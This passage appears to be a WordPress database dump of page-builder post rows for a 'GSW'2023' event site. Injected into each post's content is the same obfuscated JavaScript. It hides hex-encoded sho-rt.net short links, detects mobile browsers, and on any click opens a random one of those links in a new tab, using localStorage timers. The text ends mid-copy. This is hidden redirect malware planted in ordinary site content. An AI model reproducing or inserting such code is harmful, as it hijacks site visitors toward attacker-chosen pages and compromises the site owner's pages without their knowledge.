US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665119554164{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #FFFFFF), color-stop(54%, #FFFFFF), color-stop(81%, #FFFFFF), color-stop(95%, #FFFFFF));background: -moz-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -webkit-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -o-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -ms-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#0367bf\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_basic_grid post_type=\"wp_template\" max_items=\"2\" element_width=\"6\" grid_id=\"vc_gid:1665120281917-b66c3205-14a9-9\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 20:29:58','2022-10-06 20:29:58','',2167,'https://gsw2023.com/?p=2332',0,'revision','',0),
(2333,1,'2022-10-06 20:33:22','0000-00-00 00:00:00','<p>[vc_gitem c_zone_position=\"bottom\"][vc_gitem_animated_block animation=\"slideBottom\"][vc_gitem_zone_a height_mode=\"original\" featured_image=\"yes\"][vc_gitem_row position=\"top\"][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][vc_gitem_row position=\"middle\"][vc_gitem_col width=\"1/2\"][/vc_gitem_col][vc_gitem_col width=\"1/2\"][/vc_gitem_col][/vc_gitem_row][vc_gitem_row position=\"bottom\"][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][/vc_gitem_zone_a][vc_gitem_zone_b link=\"post_link\" css=\".vc_custom_1419328999899{background-color: rgba(0,0,0,0.5) !important;*background-color: rgb(0,0,0) !important;}\"][vc_gitem_row position=\"top\"][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][vc_gitem_row position=\"middle\"][vc_gitem_col][vc_icon icon_fontawesome=\"fa fa-search\" color=\"white\" align=\"center\"][/vc_gitem_col][/vc_gitem_row][vc_gitem_row position=\"bottom\"][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][/vc_gitem_zone_b][/vc_gitem_animated_block][vc_gitem_zone_c css=\".vc_custom_1419328781574{background-color: #f4f4f4 !important;}\"][vc_gitem_row][vc_gitem_col][vc_gitem_post_title font_container=\"tag:h4|text_align:left\"][vc_gitem_post_excerpt font_container=\"tag:p|text_align:left\"][vc_btn link=\"post_link\" title=\"Read more\" style=\"flat\" color=\"juicy-pink\" align=\"left\"][/vc_gitem_col][/vc_gitem_row][/vc_gitem_zone_c][/vc_gitem]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','','','draft','closed','closed','','','','','2022-10-06 20:33:22','2022-10-06 20:33:22','',0,'https://gsw2023.com/?post_type=vc_grid_item&#038;p=2333',0,'vc_grid_item','',0),
(2334,1,'2022-10-06 20:37:28','0000-00-00 00:00:00','<p>[vc_gitem c_zone_position=\"top\"][vc_gitem_zone_c][vc_gitem_row][vc_gitem_col][vc_single_image link=\"image_full\" link_target=\"true\" image=\"2325\" alignment=\"center\" style=\"vc_box_border_circle_2\" onclick=\"custom_link\" title=\"AASTMT\" img_size=\"50x50\"][vc_btn][/vc_gitem_col][/vc_gitem_row][vc_gitem_row][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][/vc_gitem_zone_c][vc_gitem_animated_block][vc_gitem_zone_a][vc_gitem_row position=\"top\"][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][vc_gitem_row position=\"middle\"][vc_gitem_col width=\"1/2\"][/vc_gitem_col][vc_gitem_col width=\"1/2\"][/vc_gitem_col][/vc_gitem_row][vc_gitem_row position=\"bottom\"][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][/vc_gitem_zone_a][vc_gitem_zone_b][vc_gitem_row position=\"top\"][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][vc_gitem_row position=\"middle\"][vc_gitem_col width=\"1/2\"][/vc_gitem_col][vc_gitem_col width=\"1/2\"][/vc_gitem_col][/vc_gitem_row][vc_gitem_row position=\"bottom\"][vc_gitem_col][/vc_gitem_col][/vc_gitem_row][/vc_gitem_zone_b][/vc_gitem_animated_block][/vc_gitem]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x3